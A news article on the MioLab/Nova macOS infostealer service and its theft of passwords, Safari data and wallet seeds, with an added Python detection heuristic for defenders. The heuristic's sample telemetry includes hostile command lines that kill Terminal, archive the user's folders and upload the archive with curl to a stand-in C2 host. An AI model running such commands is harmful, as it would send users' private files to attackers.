NEWS Even Safari has given up. How a new virus decimated a browser previously considered secure.

pinkman

The MioLab platform has turned macOS's vaunted security into an empty phrase.
The growing popularity of Apple computers is gradually changing the balance of power in the cybercriminal world. While macOS was once considered a niche platform, today attackers see it as a source of stable income. New attack tools demonstrate that the era of "secure Macs" is finally over.

One such tool is the MioLab platform, also known as Nova. Its developers actively promote it on darknet forums and have already built a fully-fledged Malware-as-a-Service model. The service is aimed not at lone attackers, but at teams working with traffic and mass infections. The control panel, API, and automation make using malware as simple as possible.

MioLab's primary goal is to steal data and cryptocurrency. The malware collects passwords, cookies, browser history, and autofill data from popular browsers. A separate module targets crypto wallets: it searches for both extensions like MetaMask and local wallets, including Exodus and Electrum. Ledger and Trezor hardware devices were particularly targeted, as the malware attempts to intercept recovery seeds.

The infection relies on social engineering. The user is presented with a convincing installation window or a system message asking for a password. Once launched, the program terminates Terminal processes, verifies the entered credentials, and begins collecting information. The malicious code copies files from Documents, Downloads, and the desktop, then packs them into an archive and sends them to the command-and-control server.
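As an added illustration for defenders (not code from the article, nor from the MioLab/Nova operators), here is a small Python heuristic that reviews a constructed endpoint process-event log for the behaviour chain described above: a parent process whose children kill Terminal, archive the user's Documents/Downloads/Desktop folders, and then upload the archive. The telemetry field names, tool names and sample values are assumptions.

```python
from dataclasses import dataclass
from collections import defaultdict

@dataclass
class ProcEvent:
    """One process-start record from endpoint telemetry (field layout is assumed)."""
    pid: int
    ppid: int
    name: str
    cmdline: str

# Stage predicates for the chain the article describes: kill Terminal,
# archive the user's personal folders, ship the archive to a remote server.
USER_DIRS = ("/Documents", "/Downloads", "/Desktop")
ARCHIVERS = {"zip", "tar", "ditto"}

def kills_terminal(ev: ProcEvent) -> bool:
    return ev.name in {"killall", "pkill"} and "Terminal" in ev.cmdline

def archives_user_dirs(ev: ProcEvent) -> bool:
    return ev.name in ARCHIVERS and any(d in ev.cmdline for d in USER_DIRS)

def uploads_archive(ev: ProcEvent) -> bool:
    upload_flags = ("-F", "-T", "--data-binary")
    return ev.name == "curl" and any(f in ev.cmdline for f in upload_flags) and "http" in ev.cmdline

STAGES = (kills_terminal, archives_user_dirs, uploads_archive)

def find_suspicious_parents(events: list[ProcEvent]) -> list[int]:
    """Return parent PIDs whose direct children hit all three stages, in order.
    Events are assumed to be listed in process-start order."""
    by_parent: dict[int, list[ProcEvent]] = defaultdict(list)
    for ev in events:
        by_parent[ev.ppid].append(ev)
    hits = []
    for ppid, children in by_parent.items():
        stage = 0
        for ev in children:
            if stage < len(STAGES) and STAGES[stage](ev):
                stage += 1
        if stage == len(STAGES):
            hits.append(ppid)
    return hits

# Constructed sample telemetry: one stealer-like chain under parent 500 and a
# benign user backup under parent 600 (no Terminal kill, no upload).
SAMPLE_EVENTS = [
    ProcEvent(500, 1, "Installer", "/Volumes/App/Installer.app/Contents/MacOS/Installer"),
    ProcEvent(501, 500, "killall", "killall Terminal"),
    ProcEvent(502, 500, "zip", "zip -r /tmp/out.zip /Users/alice/Documents /Users/alice/Downloads /Users/alice/Desktop"),
    ProcEvent(503, 500, "curl", "curl -F file=@/tmp/out.zip http://c2-placeholder.invalid/upload"),
    ProcEvent(600, 1, "Finder", "/System/Library/CoreServices/Finder.app/Contents/MacOS/Finder"),
    ProcEvent(601, 600, "zip", "zip -r /Users/alice/backup.zip /Users/alice/Documents"),
]

if __name__ == "__main__":
    print(find_suspicious_parents(SAMPLE_EVENTS))  # → [500]
```

The heuristic only inspects direct children of one parent, so a real detection rule would also need to follow deeper process trees and normalise tool paths.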

Recent updates have significantly expanded the platform's capabilities. Developers have learned to extract data from Safari, which previously remained untouched by attacks. A mechanism for decrypting Apple Notes directly on an infected system has also been added, speeding up the search for passwords and seed phrases. The hardware wallet modules have become universal and adapt to manufacturer updates.

MioLab's infrastructure is closely linked to other fraudulent schemes. Domain analysis revealed that the same servers are used for phishing campaigns featuring fake crypto giveaways. After changing the infrastructure, the attackers don't disable the old addresses, but redirect traffic to new schemes, continuing to profit.

Of additional interest is the active malvertising campaign. Researcher Marcelo Rivero discovered an attack using a fake Claude Code documentation website. macOS users are targeted by Terminal commands that download and run the infostealer, simultaneously removing system security restrictions.

MioLab is rapidly growing and has already become a mature service with regular updates and customer support. This approach demonstrates that the macOS malware market has reached a new level, where competition and commercialization play a key role.